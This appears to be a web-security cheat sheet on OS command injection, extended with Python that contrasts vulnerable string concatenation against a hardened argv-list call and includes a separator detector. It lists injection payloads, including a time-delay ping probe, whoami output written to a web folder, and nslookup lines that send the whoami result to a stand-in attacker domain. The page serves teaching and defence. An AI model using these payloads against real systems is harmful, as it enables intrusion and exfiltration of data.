OS command injection
Whenever a web app builds an OS command from user-controlled input and hands it to a shell (e.g. via a Perl script), attacker-supplied commands can be injected alongside the intended one. This can potentially lead to a full compromise of the system.
Executing arbitrary commands
param=& echo test &
param=1|echo test
Blind command injections
Detecting vulnerabilities using time delays
& ping -c 10 127.0.0.1 &
Exploiting vulnerabilities by redirecting output
& whoami > /var/www/static/whoami.txt &
Exploiting vulnerabilities using out-of-band (OAST) techniques
& nslookup kgji2ohoyw.web-attacker.com &
Exfiltrate data
& nslookup `whoami`.kgji2ohoyw.web-attacker.com &
Ways of injection
Command separators
Windows and Unix:
&
&&
|
||
Unix only:
;
Newline:
0x0a
Backticks:
`command`
Dollar character:
$(command)
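The following Python is an added example, not code from the original page: it places the flawed string-concatenation pattern beside a hardened argv-list version, shows how a shell would tokenize the separators listed above, and includes a small detector that reports which separators occur in a request parameter (useful for WAF rules or log triage). The function names, the hostname allowlist pattern and the sample payloads are assumptions made here for illustration.

```python
import re
import shlex
import subprocess

# Separators and substitution syntax listed on the page. Two-character forms
# are checked before their single-character counterparts so "&&" is named as such.
SEPARATORS = ("&&", "||", "&", "|", ";", "\n", "`", "$(")

# Allowlist for the one value this endpoint accepts: a hostname or IPv4 literal.
# Assumed here for illustration; tighten it to whatever your input really is.
HOST_PATTERN = re.compile(r"[A-Za-z0-9][A-Za-z0-9.-]{0,253}")


def vulnerable_command(host: str) -> str:
    """The flawed pattern: user input concatenated into a string that is later
    handed to /bin/sh (subprocess with shell=True, Perl system()/backticks, ...).
    Returned rather than executed so the tokenization can be inspected."""
    return "ping -c 1 " + host


def shell_tokens(cmd: str) -> list:
    """Approximate how /bin/sh splits the command string into words and control
    operators (shlex with punctuation_chars mimics the operator split)."""
    return list(shlex.shlex(cmd, punctuation_chars=True))


def detect_separators(value: str) -> list:
    """Detection helper: report which of the page's injection separators occur
    in a request parameter value."""
    return [sep for sep in SEPARATORS if sep in value]


def build_argv(host: str) -> list:
    """Hardened form: strict allowlist validation plus an argv list, so no shell
    ever parses the value. re.fullmatch (rather than '$') also rejects a trailing
    newline, the 0x0a separator from the list above."""
    if not HOST_PATTERN.fullmatch(host):
        raise ValueError("rejected host value: %r" % host)
    return ["ping", "-c", "1", host]


def run_ping(host: str) -> subprocess.CompletedProcess:
    """Execute the validated command without shell=True. Even if validation were
    loosened, separators would reach ping as a literal argument, not a shell."""
    return subprocess.run(build_argv(host), capture_output=True, text=True, timeout=30)


if __name__ == "__main__":
    # Constructed sample parameter values, drawn from the payload shapes above.
    payloads = [
        "& echo test &",
        "1|echo test",
        "& nslookup `whoami`.kgji2ohoyw.web-attacker.com &",
        "$(whoami)",
        "example.com\n",
        "127.0.0.1",
    ]
    for p in payloads:
        print("%-55r separators=%s" % (p, detect_separators(p)))
        print("   shell would see:", shell_tokens(vulnerable_command(p)))
        try:
            print("   hardened argv:", build_argv(p))
        except ValueError as err:
            print("   hardened:", err)
```

The point of the argv form is that the operating system receives the host as one argument to `ping`; characters such as `&` or `;` are never interpreted, so the separator list above stops being a concern. Validation is still kept, because an argument that is legal for the shell can still be an option or an unexpected value for the program being called.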